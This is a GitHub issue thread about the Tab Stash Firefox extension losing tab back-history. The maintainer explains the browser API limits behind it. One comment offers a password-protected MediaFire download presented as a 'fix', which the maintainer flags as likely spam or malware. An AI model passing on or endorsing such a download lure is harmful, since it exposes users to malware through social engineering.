### ISSUE TITLE
History not maintained for stash tabs

### ISSUE THREAD

**Issue by ssrajasekhark** [josh-berry/tab-stash#519]
### System Details

- **OS Version:** [Windows 11]
- **Browser Version:** [129.0.2]
- **Tab Stash Version:** [3.0.1`]

### Describe the Bug

      Backward all history for particular tab not maintained after opened stashed tab from 2 nd time onwards.

### Steps to Reproduce

 for eg: i opened google, i search for any forums, after that i clicked computer fourms, then i clicked ram upgrade thread, so here i opened 4 ursl, when i click long press on backward button tab it shows 4 urls which is backward history.
now i stash this tab, after i restored it for first time it opens and i click longpress backward option i can see 4 urls, but i closed after the opened same tab for 2nd time, now i can see only 2 urls, full history not showing. 

### Expected Behavior
It show all previously history tabs for the current opened stash tab.

<hr>
<em>Readers: If you are also experiencing this bug, please vote for it by giving the ORIGINAL POST a thumbs-up using the :smiley: button.  You are welcome to leave comments and discuss the issue if you have more details to add, but "Me too!" comments are not counted by the voting system.</em>

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by josh-berry** [comment]
> is this fix for this issue?what is this bro? size is around 122 mb.

Most likely it's spam/malware that made it through GitHub's anti-spam systems. Do not open it, just delete it immediately.

**Comment by josh-berry** [comment]
To actually answer your question:

Tab Stash unfortunately does not and cannot save tab history reliably; no extension can. Firefox unfortunately just does not offer APIs for that. The way that Tab Stash tries to get around this is by keeping tabs that are in your stash open but hidden. However, if you close the tab or window, that open tab and its history is lost.

Hope that helps to explain what you're seeing! Sorry that's probably not the answer you're looking for.

[see also #301]

**Comment by ssrajasekhark** [comment]
> To actually answer your question:
> 
> Tab Stash unfortunately does not and cannot save tab history reliably; no extension can. Firefox unfortunately just does not offer APIs for that. The way that Tab Stash tries to get around this is by keeping tabs that are in your stash open but hidden. However, if you close the tab or window, that open tab and its history is lost.
> 
> Hope that helps to explain what you're seeing! Sorry that's probably not the answer you're looking for.
> 
> [see also #301]

but after stashed,when i opened the stashed tab first time, i can able to navigate the history , after closed and trying to open 2nd time it is not showing, if it is not possible to show, then how it is showing for first time.

**Comment by josh-berry** [comment]
> but after stashed,when i opened the stashed tab first time, i can able to navigate the history , after closed and trying to open 2nd time it is not showing, if it is not possible to show, then how it is showing for first time.

The first time (when you are using Tab Stash to save the tab), the tab is not actually closed—it's hidden. So the history is preserved because the tab _is not actually closed_. The second time (when you are closing the tab yourself in the Firefox UI), the tab IS actually closed, so that is the point at which the history is lost.

**Comment by ssrajasekhark** [comment]
thanks for the information.
